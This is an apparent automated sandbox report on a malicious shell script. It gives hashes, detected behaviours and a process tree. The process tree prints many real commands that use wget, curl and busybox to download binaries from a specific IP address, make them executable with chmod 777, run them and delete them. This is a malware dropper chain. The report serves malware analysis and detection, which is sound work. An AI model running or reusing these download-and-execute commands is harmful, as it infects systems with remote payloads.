Analysis
-
max time kernel
60s -
max time network
103s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
25/11/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
-
Size
10KB
-
MD5
b643808c01faa0f92bf870288eb8dd16
-
SHA1
494306996b3ee0573b6da340ee334523cd39f9eb
-
SHA256
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
-
SHA512
f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb
-
SSDEEP
96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 25 IoCs
Checks CPU configuration 1 TTPs 25 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description | ioc | Process
File opened for reading | /proc/cpuinfo | curl
-
description | ioc | Process
File opened for reading | /proc/self/auxv | curl
File opened for reading | /proc/sys/crypto/fips_enabled | curl
-
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:655
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:668
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:677
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:685
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:686
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:690
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:692
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:693
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:694
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:698
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:709
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:710
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:712
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:721
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:727
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:728
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:737
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:757
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:762
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:764
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:767
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:770
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:771
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:779
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:784
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:785
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:795
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:802
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:803
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:818
-
-
/bin/chmodchmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:821
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:822
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:824
-
-
/bin/chmodchmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:828
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:830
-
-
/bin/chmodchmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:834
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:836
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:838
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:841
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:842
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:844
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:847
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:848
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:850
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:853
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:854
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:856
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:859
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:860
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:862
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:870
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:873
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:874
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:876
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:879
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:880
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:882
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:885
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:886
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:888
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:895
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:901
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:909
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:912
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:913
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:915
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:918
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:919
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97